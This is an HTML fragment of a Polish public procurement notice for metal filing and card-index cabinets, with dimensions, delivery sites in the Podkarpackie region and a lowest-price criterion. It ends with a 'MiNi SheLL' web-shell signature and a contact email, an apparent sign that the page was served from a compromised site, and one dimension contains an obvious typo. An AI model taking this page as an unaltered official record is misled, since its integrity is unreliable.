<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.40.00-0, 39.12.11.00-7, 39.11.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostaw mebli metalowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa metalowych szaf aktowych i kartotekowych określonych poniżej.
1.1	Szafa metalowa na akta. Szafa metalowa na akta o wymiarach zewnętrznych : wys. od 19000 mm do 2000 mm, szer. od 900 mm do 1000 mm, głębokość od 410 mm do 435 mm, wyposażona w dwoje symetrycznie otwieranych drzwi, zamykanych zamkiem patentowym, klamką uruchamiającą wewnętrzne rygle blokujące od środka drzwi. Ilość półek czynnych 5 ( w tym półka stanowiąca dno szafy). Szafa wykonana  z blachy stalowej malowanej na zewnątrz i wewnątrz proszkowo lub natryskowo na kolor jasny popiel. Szafy powinny posiadać parametry nie gorsze niż parametry szafy Litopol lub Kart Map
1.2. Szafa kartotekowa Format A-4  pojedyncza.Szafa kartotekowa metalowa do archiwizowania dokumentów - 1 rząd w szufladzie.Wymiary zewnętrzne szafy:  szerokość od. 400 do 440 mm,  głębokość od. 580 do 700 mm (przy zachowaniu głębokości użytkowej szuflady min. 500 mm), wysokość od. 1093 do 1320 mm, wyposażona w  4 szuflady.Szuflady zamykane centralnie jednym zamkiem patentowym w górnej, z boku lub powyżej górnej  szuflady. Szuflady zawieszone na prowadnicach kulkowych o pełnym wysuwie  z zabezpieczeniem przed wypadaniem. Możliwość wysuwania dowolnie wybranej tylko jednej szuflady w celu zachowania  stabilności . Obciążenie szuflad min 50 kg. Szafa wykonana z blachy stalowej malowanej wraz z szufladami wewnątrz i zewnątrz  proszkowo lub natryskowo na kolor jasny popiel. Jakość nie gorsza niż szafy Kart-Map Olsztyn,  Met-Lak, Malow.
1.3. Szafa kartotekowa Format A-5.Szafa kartotekowa metalowa do archiwizowania dokumentów.Wymiary zewnętrzne szafy  :  szerokość od. 540 do 550 mm, głębokość szafy od. 580 do  700 mm (przy zachowaniu głębokości użytkowej szuflady min. 500 mm), wysokość szafki od. 1038 - 1285 mm,  wyposażona w 5 szuflad, każda z nich podzielona na długość listwą metalową, umożliwiającą przechowywanie dwóch rzędów dokumentów A-5 w jednej w szufladzie. Szuflady zamykane centralnie jednym zamkiem patentowym w górnej z boku lub powyżej górnej szuflady. Szuflady zawieszone na prowadnicach kulkowych o pełnym wysuwie, z zabezpieczeniem przed wypadaniem. Możliwość wysuwania dowolnie wybranej  jednej szuflady w celu zachowania stabilności. Minimalne obciążenie szuflad 50 kg. Szafa wykonana  z blachy stalowej  malowanej  wraz z szufladami wewnątrz i zewnątrz proszkowo lub natryskowo  na kolor jasny popiel.Jakość nie gorsza niż  szafy  Kart-Map Olsztyn, Met-Lak, Malow.Grubości blach zewnętrznych w zamawianych szafach (korpusów)  min. 1 mm, frontów, szuflad - min. 1 mm. Pozostałe części szuflad z blachy gr. Min. 0,8 mm2. Warunki i terminy dostaw: 
2.1. Meble będą dostarczane do siedziby O/ZUS w Rzeszowie przy Al. Piłsudskiego 12 oraz do podległych jednostek terenowych tzn: IZUS w Przeworsku przy ul Dworcowej 1, IZUS w Przemyślu przy ul. Brodzińskiego 6, IZUS w Leżajsku przy ul. Mickiewicza 24, IZUS w Jarosławiu przy ul. Słowackiego 21 oraz Biura Terenowego w  Lubaczowie przy ul. Legionów 4 
2.2. Meble należy dostarczyć, rozładować, zmontować oraz umieścić w pomieszczeniach wskazanych przez zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com